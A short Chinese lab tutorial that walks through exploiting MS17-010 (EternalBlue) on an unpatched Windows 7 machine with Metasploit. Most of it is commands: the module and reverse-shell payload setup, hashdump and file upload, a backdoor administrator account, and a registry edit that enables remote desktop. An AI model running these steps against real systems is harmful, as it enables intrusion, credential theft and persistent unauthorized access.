1、實驗環境
攻擊機:Kali或安裝metasploit的機器
靶機:未打永恆之藍補丁和防火牆已經關閉的win7
2、漏洞利用
2.1 進入msf控制台,在終端上輸入
1 shell
2.2 查找利用模塊
1 search ms17_010
2.3 配置參數
1 use exploit/windows/smb/ms17_010_eternalblue 2 set rhosts 172.17.89.2 3 set payload windows/x64/meterpreter/reverse_tcp
2.4 查看配置是否完成
1 show options
2.5 進行攻擊
1 run
2.6 成功利用。在這里可以獲取目標主機的信息,sysinfo、ipconfig、shell、hashdump等,meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpreter shell的鏈接。
1 screenshot #截圖 2 upload xxx.exe c:\xxx.exe #可以上傳任意文件
2.7 get shell。新增一個用戶並設置為管理員
1 net user test 123456 /add
2 net localgroup Administrators test /add
2.7。開啟遠程桌面。使用剛才的test用戶直接遠程桌面到靶機。
1 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f